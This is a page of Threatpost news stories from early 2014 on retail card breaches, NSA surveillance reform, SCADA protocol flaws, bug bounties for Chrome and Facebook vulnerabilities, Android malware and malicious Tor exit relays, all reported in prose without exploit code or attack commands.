Threatpost for B2B
Officials at Michaels, the large craft and home goods retailer, are investigating a potential data breach that has apparently affected an unknown number of cards used in the chain’s stores in the last few weeks. The company has released very little detail about the compromise but said that it is still investigating the incident.
The apparent intrusion at Michaels is the latest in a string of data breaches at large retailers in the last few months, a run that started with the attack on Target in the fall that compromised financial and personal information of as many as 110 million customers. That breach reportedly involves malware being installed on point-of-sale devices in a number of the company’s stores. There also was an intrusion at Neiman Marcus around the same time, beginning in July and lasting through October and resulting in the compromise of data belonging to 1.1 million people.
The scope of the Michaels breach is unknown at this point, and company officials said they’re still not sure whether the attack was on their network or somewhere else in the payment ecosystem.
“We are concerned there may have been a data security attack on Michaels that may have affected our customers’ payment card information and we are taking aggressive action to determine the nature and scope of the issue,” said Chuck Rubin, CEO of Michaels. “While we have not confirmed a compromise to our systems, we believe it is in the best interest of our customers to alert them to this potential issue so they can take steps to protect themselves, for example, by reviewing their payment card account statements for unauthorized charges.”
“Throughout our 40-year history, our customers have always been our number one priority and we deeply regret any inconvenience this may cause. The privacy and security of our customers’ information is of critical importance to us and we are focused on addressing this issue.”
Retailers always have been a prime target for attackers, thanks to their huge databases of customer information and payment-card data. There has been a push in the security industry to shore up the security of retailers’ networks, especially focusing on the use of encryption. But attackers have been able to find ways around these obstacles. One of the interesting aspects of the Target data breach that has attracted a lot of attention is the attackers’ use of malware known as BlackPOS that has the ability to grab payment data from the POS terminals just before it’s encrypted. That capability defeats the protection that end-to-end encryption is meant to offer, allowing attackers to circumvent one of the key defenses retailers employ.
Image from Flickr photos of Aranami.
Dennis Fisher and Mike Mimoso talk about the big security stories of the last couple of weeks, including the developments in the Target data breach, the president’s speech on NSA surveillance reforms and SCADA security woes.http://threatpost.com/files/2014/01/digital_underground_142.mp3
It was only going to be a matter of time before someone figured out a way past Snapchat’s new CAPTCHA verification method. Just one day after the photo sharing application announced its latest security measure, one researcher claimed Wednesday that he was able to hack it with as few as 100 lines of C++ code.
Steven Hickson, a computer engineering grad from Clemson University wrote on his personal blog this week that it only took him about 30 minutes to come up with a way around the company’s new people verification system and that it works “with 100 percent accuracy.”
The system is based on identifying a series of nine illustrations, right – some have a white ghost, the app’s mascots, some don’t. To make sure a new user is human, Snapchat has the user click on however many of the boxes contain a ghost.
“This is an incredibly bad way to verify someone is a person because it is such an easy problem for a computer to solve,” Hickson wrote on his Computer Vision Blog Wednesday.
Hickson used open source code initially developed by Intel, OpenCV (Open Source Computer Vision Library) and a segmentation method known as simple thresholding to get his computer on the right track. OpenCV assists in “real-time computer vision” and thresholding helps the computer differentiate whichever pixels you’re interested in from the rest of them.
Hickson also used algorithms like SURF, an interest point detector and descriptor, and FLANN, a library for performing fast approximate nearest neighbor searches to perform a “uniqueness test to determine that multiple keypoints in the training image weren’t being singularly matched in the testing image.”
Basically Hickson gave his computer an idea of what the Snapchat ghost looks like and it went to work, searching for corresponding points in Snapchat’s puzzle and matching ghosts to ghosts.
“With very little effort, my code was able to ‘find the ghost’ in the above example with 100% accuracy,” Hickson said, calling what he did “one of the easier tasks in computer vision.
Hickson, who posted the code he used on Github, mentions there are several different ways he could have gone about his experiment. Histogram of Oriented Gradients, or HOG, is another form of code used for object detection that lets computers see the world, so to speak.
It’s another security misstep by the much-buzzed about Snapchat.
Late last year researchers divulged the details regarding two privacy bugs in the application’s ‘Find Friends’ functionality that hackers quickly used to leak 4.6 million of the service’s usernames and partial phone numbers. The hackers started a site, SnapchatDB.info, to host the information but that site has since been taken down.
The new verification system was the latest move by the company to shore up the app’s security.
Just a few weeks ago the company apologized for their error and pushed out a new update of the app that requires users to verify their phone number before using the ‘Find Friends’ feature and gave users the ability to opt-out from linking their phone numbers with their usernames.
Perhaps the biggest condemnation of President Obama’s address last Friday announcing reforms to the NSA’s surveillance programs was his failure to mention any of the agency’s alleged involvement in subverting cryptography standards and the impact that has had on the trustworthiness of products built on those baselines.
A long list of the nation’s top cryptographers and security influencers took a stand today against the government’s surveillance activities and subversion of security technology via an open letter. The experts condemn the intelligence community’s practices and point out that tampering with crypto standards via the insertion of backdoors and the tapping of commercial links between data centers belonging to large Internet providers not only damages the privacy and civil liberties of Americans, but opens the door for malicious hackers—criminal and nation-state—to exploit the same holes used by the NSA.
“Indiscriminate collection, storage, and processing of unprecedented amounts of personal information chill free speech and invite many types of abuse, ranging from mission creep to identity theft,” the experts wrote in the letter. “These are not hypothetical problems; they have occurred many times in the past.”
The co-signers of the letter include some security and computing legends such as Steve Bellovin, Niels Ferguson, Ed Felten, Ron Rivest, Bruce Schneier and dozens of others. The letter calls on the government to be transparent about its activities and “resist the deployment of mass surveillance programs in advance of sound technical and social controls,” the letter said. The experts also lent their endorsement to a movement called Reform Government Surveillance, which was unwrapped in December.
A group of eight technology giants, including Facebook, Apple and Google, make up the Reform Government Surveillance coalition, which proposed five principles in an open letter of its own to Obama.
Those principles start with limits on the government’s ability to compel service providers to disclose user data and stop bulk collection of Internet communication. It also calls for intelligence agencies to operate under a clear, transparent legal framework that includes independent reviewing courts, which is currently not the case with the Foreign Intelligence Surveillance Court. The group asks the government to allow data to cross borders without having to worry about legal loopholes that enable government to access data stored outside the country. They also ask that governments work together to avoid conflicting laws and develop transparent legal frameworks under which governments agree to operate when it comes to requests for user data.
“The choice is not whether to allow the NSA to spy. The choice is between a communications infrastructure that is vulnerable to attack at its core and one that, by default, is intrinsically secure for its users,” the letter said. “Every country, including our own, must give intelligence and law-enforcement authorities the means to pursue terrorists and criminals, but we can do so without fundamentally undermining the security that enables commerce, entertainment, personal communication, and other aspects of 21st-century life.”
Obama’s speech last week called for immediate and longterm reforms to the NSA’s bulk collection of phone call metadata. The program would end as it exists today, but the president stopped short of ending the agency’s collection of data, which it says it uses to map connections between foreigners thought to be involved in terrorism. The dragnet, however, also sweeps up communications to and from Americans who are not terror suspects, something that has outraged privacy advocates.
A class of SCADA vulnerabilities discussed at a recent conference is getting attention not only for the risks they pose to master control systems at electric utilities, but also for illuminating a dangerous gap in important critical infrastructure regulations.
Researchers Adam Crain and Chris Sistrunk demonstrated several weaknesses in vendor implementations of the DNP3 communication protocol in a number of products during the S4 Conference last week. The flaws, many of which have been patched, demonstrate how an attacker could target a non-critical, serial-based piece of field equipment at an electrical substation and knock out visibility over all of a utility’s substations. The vulnerabilities in some DNP3 implementations could allow attacks against master control systems from a field device by sending a malicious frame, or message to the control system.
“What’s different about our research is that most have focused on actual field devices—devices in substations or devices on poles—and 50 percent of our testing was on the master systems, things that communicate to all of the field devices and bring that data back to the operations center,” Crain said. “The difference is, if you had access, here you could knock out visibility to a whole system, hundreds of substations, by affecting one or two servers that are monitoring all of that.”
An attacker would need to be targeting a particular utility and gain physical access to a substation in order to drop code on a serial-based field device. While regulations spelled out by the North American Electric Reliability Corp. (NERC) cover TCP/IP communication between devices, the same isn’t true for serial-based communication.
“Where serial lines come into a master station, for instance, they won’t have the same level of protection that a TCP/IP-based connection would have,” said Michael Toecker, an ICS security consultant and engineer at Digital Bond. “There’s a complete regulatory blind spot there in the current version of the NERC standards.”
Toecker said the current NERC standards were developed shortly after the 2003 blackout in parts of the United States and they haven’t been updated according to new threats and vulnerabilities since their full implementation in the 2006 timeframe. And until the Stuxnet attack in 2010, Toecker said, there had been a relative quiet period around electric utility security. Stuxnet, however, has sparked a renewed interest in critical infrastructure cybersecurity.
“I think Stuxnet proved that: 1) there was a case for going after industrial control systems; 2) there was an impact in going after industrial control systems; and 3) showed that the devices and protocols were a valid target,” Toecker said. “And that caused interest in the security research community and they found this place is rife with vulnerabilities, low-hanging fruit.”
Crain and Sistrunk hope their research, which stems from a fuzzing tool developed by Crain called Project Robus, will spark a renewed interest in updating this part of the NERC standards. Plenty of work has been done investigating SCADA and ICS vulnerabilities, including Project SHINE, which is an enumeration of vulnerable control system equipment exposed online and reachable using the Shodan search engine. Those projects, however, don’t necessarily focus on master control systems, rather they concentrate on smaller field devices that could have a Web-enabled interface that is protected with just a default or weak credential.
Some of the non-critical devices Crain and Sistrunk talked about at S4 rely largely on physical security to keep them safe, and are not covered by NERC regulations. Initiatives such as the Smart Grid are all about pushing intelligence away from substations and into areas where it may not be practical to have adequate physical security.
“No camera. No fence. Just a lock pick away from somebody getting at that cabinet and then affecting visibility for a huge subset of the distribution system,” Crain said.
DNP3 is the primary SCADA protocol used for electricity distribution in North America, Crain said. The majority of electric utilities use the protocol for some portion of their SCADA infrastructure, pulling measurements from field devices and the ability to send controls to the field, he said.
“As far as the digital controls on critical assets that communicate to random substations, if it’s done over IP, there’s capability there to put in place protections, things like deep packet inspection,” Toecker said. “The problem exists on the serial side; I’ve yet to see any technology that looks directly at the bare serial protocol and looks for these types of events. There are ways to re-architect systems to look at these things, I’m not sure everyone’s done it.”
Crain and Sistrunk’s research has resulted in 15 advisories being issued by the ICS-CERT, all around DNP3 and all found using Crain’s Project Robus fuzzer; the fuzzer will be released as open source, Crain said, and said that soon it will also be scanning for other protocols beyond DNP3.
“We have not found anything that would suggest there is anything wrong with the specification,” Crain said. “These are all bugs in implementations from various vendors. There were two vendors we tested out of the 30 products where we didn’t find any detectable vulnerabilities. So at this point, it’s possible to implement the standard without a security or robustness defect.”
In the meantime, Toecker said the industry is still in the beginning stages of creating a standard for serial-base network security for electric utilities. NERC, Toecker said, takes its direction from the Federal Energy Regulatory Commission (FERC), which has mandated discussions on the topic, but a new set of regs could be as far as a year away.
“We’re in the very beginning stages of addressing these concerns from FERC,” Toecker said. “Stay tuned.”
The attackers who penetrated the Neiman Marcus network last year were on the network for at least three months and made off with credit and debit card data belonging to 1.1 million customers. The company said that the data breach was the result of a compromise that began in mid-July and ran until the end of October.
A company statement said that Visa, MasterCard and Discover cards were affected, including debit cards, and that at least 2,400 cards have been used fraudulently at this point.
“While the forensic and criminal investigations are ongoing, we know that malicious software (malware) was clandestinely installed on our system. It appears that the malware actively collected or “scraped” credit card data from July 16, 2013 to October 30, 2013. During those months, approximately 1,100,000 customer payment cards could have potentially been visible to the malware. To date, Visa, MasterCard and Discover have notified us that approximately 2,400 unique customer payment cards used at Neiman Marcus and Last Call stores were subsequently used fraudulently,” the statement said.
The Neiman Marcus breach is about one-hundredth the magnitude of the Target data breach in terms of the number of cards that were affected, but signs point to similar attack vectors. Target officials have confirmed that malware was found on the company’s point-of-sale systems and the attackers were able to scrape card and PIN data from the terminals just before it was encrypted. Security researchers have said that the malware used in the Target attack appears to be a variant of the BlackPOS malware.
Neiman Marcus did not say specifically that POS malware was used in the intrusion on its network, but its statement points to a similar attack methodology. In an FAQ, the company said “Your PIN was never at risk because we do not use PIN pads in our stores.”
The company said that it is working with law enforcement and a forensics firm to investigate the intrusion on its network.
“We informed federal law enforcement agencies and began working actively with the U.S. Secret Service, the payment brands, our merchant processor, a leading investigations, intelligence and risk management firm, and a leading payment brand-approved forensics firm to investigate the situation. On January 1st, the forensics firm discovered evidence that the company was the victim of a criminal cyber-security intrusion and that some customers’ cards were possibly compromised as a result. At this time, the malicious software we have found has been disabled,” the statement said.
Image from Flickr photos of Becky Mullane.
Building on the success of the last couple of years, Google plans to offer more than $2.7 million in potential rewards in the next iteration of its Pwnium hacking competition at this year’s CanSecWest conference in Vancouver. The company has run the contest in parallel with the older Pwn2Own competition at the conference, with somewhat different rules, and this year plans to allow researchers to go after Chrome OS running on both ARM- and Intel-based Chromebooks,
Pwnium began as Google’s answer to Pwn2Own, the well-known hacking contest that has attracted some of the top researchers in the industry over the course of the last few years, including Dino Dai Zovi, Charlie Miller, Chaouki Bekrar and the Vupen team and many others. Pwn2Own has traditionally not required contestants to submit complete exploit information, but rather the details of the vulnerability and the crash data. Pwnium requires researchers to submit full exploits, something that has kept some of the potential contestants away, notably the Vupen team.
But the money that Google is putting up for new compromises of Chrome OS is far beyond what’s available at Pwn2Own or any of the other major contests and has attracted a small, but elite, group of contestants in past years. The company is promising rewards of as much as $150,000 plus some bonuses, paid at Google’s discretion, for especially innovative or serious exploits.
“New this year, we will also consider significant bonuses for demonstrating a particularly impressive or surprising exploit. Potential examples include defeating kASLR, exploiting memory corruption in the 64-bit browser process or exploiting the kernel directly from a renderer process,” Google security engineer Jorge Lucángeli Obes said.
“Past Pwnium competitions have focused on Intel-based Chrome OS devices, but this year researchers can choose between an ARM-based Chromebook, the HP Chromebook 11 (WiFi), or the Acer C720 Chromebook (2GB WiFi) that is based on the Intel Haswell microarchitecture. The attack must be demonstrated against one of these devices running the then-current stable version of Chrome OS.”
The rules of the Pwnium contest dictate that contestants will have to register in advance and hand over full exploit details, along with information on each individual vulnerability used in the attack. None of the bugs used can be previously known, and the exploits have to be launched from an HTTPS Google App Engine URL.
“Any software included with the default installation may be used as part of the attack. For those without access to a physical device, the Chromium OS developer’s guide offers assistance on getting up and running inside a virtual machine, but note that a virtual environment might differ from the physical devices where the attack must be demonstrated,” Obes said.
Another independent review board investigating the National Security Agency’s collection of phone records metadata has come down hard on the program, calling it illegal, recommending the government end the program, and questioning its effectiveness in ferreting out terrorists.
The Privacy and Civil Liberties Oversight Board released a 238-page document today that examines the program as authorized by Section 215 of the PATRIOT Act. It concluded that the program “lacks a viable legal foundation under Section 215” and determined that the collection of phone records has not made a difference in the outcome of a single counterterrorism investigation.
“We are aware of no instance in which the program directly contributed to the discovery of a previously unknown terrorist plot or the disruption of a terrorist attack,” the report said. “And we believe that in only one instance over the past seven years has the program arguably contributed to the identification of an unknown terrorism suspect.”
The board said the NSA’s program poses serious implications for the privacy and civil liberties of Americans caught up in the dragnet of surveillance activity that is by law supposed to be limited to foreign targets. The board’s report concludes that call data can reveal intimate details about an individual and when that data is digitally analyzed, that person’s privacy is imperiled.
“When the government collects all of a person’s telephone records, storing them for five years in a government database that is subject to high-speed digital searching and analysis, the privacy implications go far beyond what can be revealed by the metadata of a single telephone call,” the report said.
The board also concluded that the NSA’s surveillance activities also jeopardize the work of activists, journalists and others who need to protect the sensitivity of their communication. The program has a “chilling effect” on free speech, the report said, and forces those involved in sensitive areas to have less confidence in those relationships.
This is the second time a review board has ruled against the viability of the NSA’s metadata collection activity. In December, a presidentially appointed five-member panel made close to 50 recommendations to President Barack Obama to reform the intelligence community’s surveillance programs, in addition to a number of organizational NSA reforms.
“Now two independent government panels, a bipartisan coalition in Congress, a federal judge sitting in open court, and the majority of the American public agree—the government’s bulk collection of Americans’ private phone records must end,” said Nate Cardozo, a staff attorney with the Electronic Frontier Foundation in a statement.
The PCLOB is an independent committee that operates within the Executive Branch; it was established as a recommendation coming out of the 9/11 Commission Act of 2007 and includes four part-time members and a full-time chairman. The board is appointed by the president and confirmed by the Senate and has two missions: protect the U.S. from terrorism, balancing that protection with the maintenance of privacy and civil liberties; and ensure that privacy is considered when new laws are developed that are related to terrorism.
Today’s report comes less than a week after President Obama announced limited reforms to the metadata collection program, reforms that allow the program to continue.
Obama ordered immediate changes that include pursuing calls two steps removed from a terror suspect rather than three steps, as is the current procedure. Also, he ordered Attorney General Eric Holder to work with the secret Foreign Intelligence Surveillance Court (FISC) so that during this transition period, the database storing phone call metadata can be queried only after a judicial finding or in an emergency.
He also called for increased oversight of the program, annual reviews on the declassification of Foreign Intelligence Surveillance Court opinions with privacy implications, and for the establishment of a panel of outside privacy experts to render opinions on cases before FISC hears them.
“The board’s other recommendations—increasing transparency and changing the FISA court in important ways—similarly reflect a nearly universal consensus that significant reform is needed,” said EFF Staff Attorney Mark Rumold.
Thirteen men were indicted this week for allegedly using Bluetooth-enabled skimmers to steal more than $2 million from customers at gas stations across the Southern United States between 2012 and 2013.
Documents released on Tuesday by the offices of Manhattan District Attorney Cyrus R. Vance, Jr. claim that the four lead defendants attached small skimming devices to gas pumps at Raceway and RaceTrac stations in Texas, Georgia and South Carolina to steal credit card information.
Skimmers are devices criminals can clandestinely affix to the front of ATMs to glean credit and debit card information, along with corresponding PIN data without customers knowledge.
Skimmers can come in many forms; card readers can be attached to the front of an ATM’s credit card slot and in some cases a keylogger can be laid over the ATM’s pin pad to monitor users’ passcodes. In this case, the devices were implanted internally, making them practically invisible to drivers while pumping gas.
The devices were also Bluetooth-enabled, which made it so the men didn’t have to physically remove them to get user information, they could simply download the stolen card and PIN numbers wirelessly while doing something as arbitrary as filling their tank.
From March 26, 2012 to March 28, 2013 the defendants transferred the information to bogus cards and made a series of withdrawals and deposits to specialized bank accounts – 70 in total – across Manhattan. As part of the ruse, some men withdrew money at banks in Nevada and California as well, according to documents.
According to the DA, while approximately $2.1 million was stolen and subsequently laundered, the defendants kept each of their transactions to under $10,000 as to not raise suspicions and to “avoid any cash transaction reporting requirements imposed by law.”
Four men, Garegin Spartalyan, Aram Martirosian, Hayk Dzhandzhapanyan and Davit Kudugulyan are the lead defendants in the case. The men were arrested last March and now are being charged with a slew of crimes, 426 counts in all, money laundering, criminal possession of stolen property and grand larceny, just to name a few. Nine other men are also being charged in the case with felony counts of money laundering in either the second or third degree.
Skimmers and the cybercrime rings that use them have grown more advanced in recent years. If ATM users suspect a machine has been compromised, it’s usually best practice to give the credit card slot a shake as the devices are usually attached to the machine. In this case the skimmers were internal, meaning there was no way the customers at the gas stations knew they were vulnerable.
A skimming ring in 2012 extracted $200,000 from patrons at Wrigley Field in Chicago in 2012. In that case, service employees at Wrigley who were in on the scam swiped victims’ cards using a small reader. Elsewhere, a separate ring in 2010 was found to have planted skimmers with custom-made credit card slots at 200 gas pumps across Utah.
The National Cybersecurity and Critical Infrastructure Protection Act of 2013 would amend the Homeland Security Act of 2002 to better protect the country against potentially destructive cyber attacks targeting national utilities and other critical infrastructure systems.
The House Subcommittee on Cybersecurity, Infrastructure Protection, and Security Technologies has marked up and passed the bill back to the House Committee on Homeland Security. From here, H.R. 3696 will travel to the House floor for debate and an eventual vote. Should it pass in the House, it will proceed to the Senate and eventually the Oval Office.
Outside the Capitol, the American Civil Liberties Union, American Chemistry Council, Boeing Company, and National Defense Industrial Association are among the long list of strange bedfellows expressing support for the pending legislation.
In general, the bill seeks to establish a threat-information-sharing partnership between the Department of Homeland Security and the owners and operators of the nation’s critical infrastructure systems. It also establishes a framework through which the DHS can work with international partners to harden the security of systems outside the U.S. but upon which American citizens depend.
More specifically, the bill calls on the Secretary of Homeland Security to facilitate efforts to fortify and maintain a secure, functioning, and resilient critical infrastructure. Part of his responsibility will be to ensure that the handlers of infrastructure receive actionable, industry specific cyber threat intelligence in real time.
The bill – should it become law – will also call on the secretary to work with private partners to help develop and allocate funds for voluntary security and resiliency strategies. Should an attack occur, the bill would require the DHS to assist in incident response-related activities should critical infrastructure companies request such help.
The bill also opens an avenue through which infrastructure handlers can request help from the government in finding and mitigating threats and vulnerabilities. The secretary would also be required to provide more general security educational training to handlers upon request.
Beyond these requirements and the technical minutiae fills out the rest of the bill’s text, the bill mandates that the DHS educate the broader public on the importance of securing information systems.
“H.R. 3696 strengthens our cyber defenses by bolstering and providing oversight of DHS’s cybersecurity mission, fostering collaborative public-private partnerships, while also ensuring privacy and civil liberties are protected,” the bill’s sponsors wrote. “We are greatly encouraged by the strong bipartisan support of the NCCIP Act, as well as the many endorsements it has received from both industry and privacy advocates, and we look forward to moving this legislation to the House floor.”
To that effect, the ACLU read the bill and gave it their stamp of approval, stating that “information sharing provisions in this bill do not undermine current privacy laws.”
The ACLU endorsed the bill further:
“Unlike H.R. 624, the Cyber Intelligence Sharing and Protection Act (CISPA), your bill does not create broad exceptions to the privacy laws for cybersecurity. Instead, it strengthens private-public partnerships by supporting existing Information Sharing and Analysis Centers and Sector Coordinating Councils and reinforces voluntary sharing under current statutes that already provide for many cybersecurity scenarios.”
In a letter expressing its support for the bill, the Boeing Company noted that it is constantly challenged cyber attacks that are increasing both in number and sophistication. H.R. 3696, a company spokesperson wrote, will strengthen and focus efforts as the government works in partnership with the private sector to increase defensive capabilities.
You can can read the subcommittee’s one-page explainer, broadly outlining the terms and scope of the bill, by clicking the image above.
The code disclosure is in response, said developer Tal Ater of Israel, to Google’s decision not to release a patch for the vulnerability after acknowledging to him it was a problem.
Ater wrote on a post to his personal website that he reported the issue to Google on Sept. 13 and 11 days later the company informed him that a patch was ready; he soon learned he was also eligible for a $30,000 bounty as part of the Chromium Reward Panel.
More than a month later, however, Ater said Google had yet to release the patch and told him that the issue was mired with the W3C standards organization. The W3c, in November, updated its Web Speech API Specification and indications are that the behavior may be in line with the standard.
“The security of our users is a top priority, and this feature was designed with security and privacy in mind,” a Google spokesperson said via email.
In a demo, above, Ater’s exploit begins with a Chrome user engaging with a malicious website using the browser’s speech recognition capabilities. The exploit depends on a user giving the website permission to use the microphone. The site developed for the demo is a to-do list app, and once the user is done interacting with the list, the command is given to shut off the microphone. Chrome’s flashing red dot in the browser tab disappears leading the user to think speech recognition is off.
But the exploit proves just the opposite is true.
“As long as Chrome is running, nothing that is said next to your computer is private,” the demo said.
The demo continues and the user has closed the site authorized to use speech recognition and has moved on to another website. No indication is showing that audio is being recorded, however the browser is listening, Ater said.
A hidden pop-under, disguised as a banner advertisement, is revealed that is capturing the text of the audio, sending it to Google where it is automatically analyzed and sent back to the malicious site, Ater said. In the current version of Chrome, however, Google has fixed the code and now forces pop-under ads to appear on top of the window being viewed.
“What you see here essentially turns Google Chrome into an espionage tool,” the demo said. “It compromises your privacy in your office or your home, even when you’re not using the computer. Anything said within earshot of your computer can be captured by malicious parties.”
Ater said the exploit can be programmed to stay dormant and activate only when certain keywords are said. He also said that while most sites that use speech recognition do so over HTTPS, Chrome will still remember that a user granted the site permission to use the microphone and allow it to start listening once the user visits again. With Ater’s exploit, the indicator light in Chrome will not flash and the user will not know they’re being eavesdropped.
“When you click the button to start or stop the speech recognition on the site, what you won’t notice is that the site may have also opened another hidden pop under window. This window can wait until the main site is closed, and then start listening in without asking for permission,” Ater wrote on his site. “This can be done in a window that you never saw, never interacted with, and probably didn’t even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that speech recognition is turned on in such windows – only in regular Chrome tabs.
Remote code execution bugs are the gold nuggets of security research. They’re the ones that researchers stay up all night looking for and they’re the kind of vulnerabilities that often are worth big money, whether it’s from a vulnerability broker, a government agency or a bug bounty program. For Reginaldo Silva, when he came across a serious vulnerability in the OpenID module in Drupal, he wasn’t sure right away exactly what he had or how valuable it was, so he reported it and later received a $500 bounty from Google, which uses OpenID. Only later did he realize it might have a much broader impact, and that’s how he ended up with a much, much bigger bounty from Facebook.
Silva, a computer engineer from Brazil, said he was messing around with Drupal back in September 2012 and ended up discovering a problem with the way Drupal handled OpenID. The vulnerability was an XML external entity expansion bug that allowed an attacker to read any file on a filesystem and take some other malicious actions. He reported the bug and it went into the CVE system, but a few days later he started thinking about how widely used OpenID is. He tested some Google properties and found that AppEngine and Blogger were both vulnerable and got a $500 bounty for his trouble.
But Silva kept looking around and remembered that Facebook allowed OpenID logins, but couldn’t find a way to enter an arbitrary OpenID URL, so he figured the site wasn’t vulnerable.
“So for more than a year I thought Facebook was not vulnerable at all, until one day I was testing Facebook’s Forgot your password? functionality and saw a request to https://www.facebook.com/openid/receiver.php,” Silva wrote in a blog post explaining his find.
“That’s when I began to suspect that Facebook was indeed vulnerable to that same XXE I had found out more than a year ago. I had to work a lot to confirm this suspicion, though. Long story short, when you forget your password, one of the ways you can prove to Facebook that you own an @gmail.com account is to log into your Gmail and authorize Facebook to get your basic information (such as email and name). The way this works is you’re actually logging into Facebook using your Gmail account, and this login happens over OpenID. So far, so good, but this is where I got stuck. I knew that, for my bug to work, the OpenID Relying Party (RP – Facebook) has to make a Yadis discovery request to an OpenID Provider (OP) under the attacker’s control. Let’s say http://www.ubercomp.com/. Then my malicious OP will send a response with the rogue XML that will then be parsed by the RP, and the XXE attack will work.”
Silva continued working on the Facebook login and eventually found a way to trigger the bug. But he couldn’t find a way to read any files on the vulnerable system, until he realized he had a small bug in his own code. Once he fixed that, he was in he clear.
“That’s right, the response contained Facebook’s /etc/passwd. Now we were going somewhere. By then I knew I had found the keys to the kingdom. After all, having the ability to read (almost) any file and open arbitrary network connections through the point of view of the Facebook server, and which doesn’t go through any kind of proxy was surely something Facebook wanted to avoid at any cost,” he wrote.
Silva wanted to escalate the bug to a remote code execution vulnerability, though, and kept working on the problem. However, he also wanted to make sure he played by the rules of Facebook’s bug bounty program, so he reported the XXE flaw and asked for permission to continue working on elevating it to a RCE flaw. That initial report sent the Facebook security team into full-on quick response mode immediately.
“In November, we were reading through incoming bug reports and came across a claim we wanted to investigate right away: arbitrary file reads. The report was well written and included proof of concept code, so we were able to reproduce the issue easily. After running the proof of concept to verify the issue, we filed an urgent task—triggering notifications to our on-call employees,” the Facebook security team explained in its account of the incident.
The team implemented a short-term fix in one line of code immediately and then set about trying to figure out how to push it to all of its Web servers. Once that was handled, the team looked for any associated issues and tried to determine whether there was a better long-term patch.
“After debugging, we concluded that libxml_disable_entity_loader(true) was indeed the correct final fix. Because we want to leave the code in a better state than we found it (rewrite old code, write tests, etc), writing the long term fix is often the step in the lifecycle of a bug that takes the longest. We wanted this line to run before anything else, so we put it in the lowest level of the callstack in our request initialization code,” Facebook said.
While this was happening, Silva was at lunch thinking about what he would do to escalate the vulnerability to RCE. When he returned, he discovered that Facebook already had implemented its fix.
“Needless to say, I was very impressed and disappointed at the same time, but since I knew just how I would escalate that attack to a Remote Code Execution bug, I decided to tell the security team what I’d do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not. I’m glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers,” Silva said.
The Facebook security team realized the severity of the flaw and was considering a major bounty for Silva. They settled on a formula that averaged the recommended bounties from several of the company’s program administrators and came up with the final figure: $33,500. That’s one of the higher bounties paid by any of the major vulnerability reward programs, outside of the special bounties that Google sometimes pays in its Pwnium contest or Microsoft pays for mitigation bypasses.
“Plus, and more importantly, I get to brag I broke into Facebook… Nice, huh?” Silva said.
A new strain of Android malware has been spotted that masquerades as an Android security app but once installed, can steal text messages and intercept phone calls without the device’s owner being any the wiser.
Dubbed Android.HeHe, the malware has six variants according to a blog post yesterday by Hitesh Dharmdasani, a mobile malware researcher with FireEye.
The malware apparently comes disguised as a security update (“Android Security”) for the phone’s operating system and once it’s set in place, it contacts the command-and-control server and conducts surveillance on incoming SMS messages. The command-and-control server responds with a list of phone numbers that “are of interest to the malware author,” according to Dharmdasani. If one of those numbers sends an SMS or makes a call to a compromised device, the malware intercepts it, refrains from sending the device a notification and removes the message from the SMS history.
While text messages are logged and sent to the C&C, phone calls are outright silenced and rejected.
Other information, like the phone’s International Mobile Station Equipment Identity (IMEI) number, its phone number, SMS address and channel ID are also collected, converted into JSON, then a string and sent off to the C&C as well.
Further information like the phone’s model, operating system version, associated network (GSM/CDMA) are sent off to the C+C in the same fashion.
While the C&C has since gone offline, FireEye researchers were still able to analyze how the server processed responses.
While FireEye’s blog post goes into the malware much more in depth, including a technical discussion of the malware’s “sandbox-evasion tactic,” it’s further proof that threats against Android – and even more variants of those threats – are continuing to stack up.
A small number of Tor exit relays are misbehaving, conducting man-in-the-middle attacks and monitoring encrypted traffic from users of the anonymity network.
Researchers from Karlstad University in Sweden published a paper this week examining the malicious behavior of some Tor exit relays and found 25 that were either behaving maliciously, or were misconfigured to the point where they would raise a red flag on the network. The nearly two dozen relays in question are a small fraction of the available exit nodes—as many as 1,000 at a given time—that act as a final gateway for a user’s traffic to pass before it hits the open Internet.
The experiment, conducted by Phillip Winter and Stefan Lindskog, began on Sept. 19 and was carried out using a free tool built by the two researchers called exitmap. The tool scans exit relays using a number of modules the pair developed that scan for common attacks such as man-in-the-middle, SSH, DNS, and even sslstrip attacks developed by researcher Moxie Marlinspike.
The scans went on for four months and 25 malicious or misconfigured exit relays were exposed. Most of the relays, the pair’s paper “Spoiled Onions: Exposing Malicious Tor Exit Relays” said, reside in Russia. Most of the attacks were man-in-the-middle attacks where someone tried to inject code into an encrypted traffic stream as it left Tor. Two sslstrip attacks were discovered, while a handful of others blocked traffic to pornography sites or social media sites in areas where censorship of the Internet is tight.
The Russian relays had the same fingerprint, leading the researchers to conclude the same person or group was behind those relays; the fingerprint characteristics include similarities in the self-signed certificates used by the relays and the use of the same root certificate called “Main Authority.” Most of the IP addresses belonging to those relays were run on the network of a virtual private system provider, the paper said, adding that several were on the same netblock belonging to GlobalTel-Net. The attacks, the paper said, may date back to February 2013.
Those Russian relays, the paper said, also took a great interest in users’ activities on Facebook and designed attacks that tried to tamper with connections to Facebook. The researchers wrote that targeting individuals using Tor is difficult, but less so is the targeting of classes of users based on their destination. The paper made no claim as to the identity of the attackers or what their interest in Facebook activity might be.
The use of a self-signed certificate in these attacks points to a lack of sophistication on the attacker’s part, in that self-signed certs trigger the about:certerror warning page on the Tor browser. Similar to Firefox, on which the Tor browser is built, about:certerror warns a user that the connection is untrusted and forces the user to click through if they wish to continue.
Winter and Lindskog wrote a separate post on the Tor Project blog that put the attacks into perspective, clarifying the risk and pointing out that the number of malicious relays is low.
“Tor clients select relays in their circuits based on the bandwidth they are contributing to the network. Faster relays see more traffic than slower relays which balances the load in the Tor network,” they wrote. “Many of the malicious exit relays contributed relatively little bandwidth to the Tor network which makes them quite unlikely to be chosen as relay in a circuit.”
They also point out that some of these same attacks are used on public Wi-Fi networks for example, and said the bigger issue is what they call the “broken” Certificate Authority system.
“Do you actually know all the ~50 organisations who you implicitly trust when you start your Firefox, Chrome, or TorBrowser?” they said. “Making the CA system more secure is a very challenging task for the entire Internet and not just the Tor network.”
American gas and oil companies have been targeted by a hacking group with ties to the Russian Federation for close to 18 months, a new research report indicates.
